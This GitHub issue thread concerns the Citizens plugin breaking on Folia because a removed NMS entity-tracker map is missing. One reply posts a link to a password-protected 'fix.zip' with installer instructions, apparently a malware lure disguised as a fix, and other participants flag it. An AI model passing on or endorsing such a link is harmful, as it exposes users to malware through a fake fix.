### ISSUE TITLE
Deleting a Map from NMS resulted in unsupported

### ISSUE THREAD

**Issue by SharkPika** [PaperMC/Folia#282]
### Expected behavior

Citizens plugin's NPCs of type Player cannot be displayed

### Observed/Actual behavior

Citizens plugin's NPCs of type Player cannot be displayed

### Steps/models to reproduce

![paper](https://github.com/user-attachments/assets/2c31b53a-1370-46de-96b9-3fda78d576ad)
picture: has Int2ObjectMap<EntityTracker> K
but in folia there didnt have Int2ObjectMap<EntityTracker> K
but Citizens plugin need it
how can I do to fix it
Citizens code:
    @Override
    public EntityPacketTracker getPacketTracker(org.bukkit.entity.Entity entity) {
        ServerLevel server = (ServerLevel) getHandle(entity).level();
        TrackedEntity entry = server.getChunkSource().chunkMap.entityMap.get(entity.getEntityId());
        if (entry == null)
            return null;
        return new EntityPacketTracker() {
            @Override
            public void link(Player player) {
                entry.updatePlayer((ServerPlayer) getHandle(player));
            }

            @Override
            public void run() {
            }

            @Override
            public void unlink(Player player) {
                entry.removePlayer((ServerPlayer) getHandle(player));
            }

            @Override
            public void unlinkAll(Consumer<Player> callback) {
                entry.broadcastRemoved();
            }
        };
    }

the entityMap is K

### Plugin and Datapack List

Citizens

### Folia version

1.20.4

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Nacioszeczek** [comment]
Please do not download the above file.

**Comment by SharkPika** [comment]
> Please do not download the above file.

ik, ty

**Comment by Warriorrrr** [comment]
Folia has to make a lot of changes internally to work properly and safely, re-adding that map is not possible. Plugins have to adapt to folia, not the other way around.
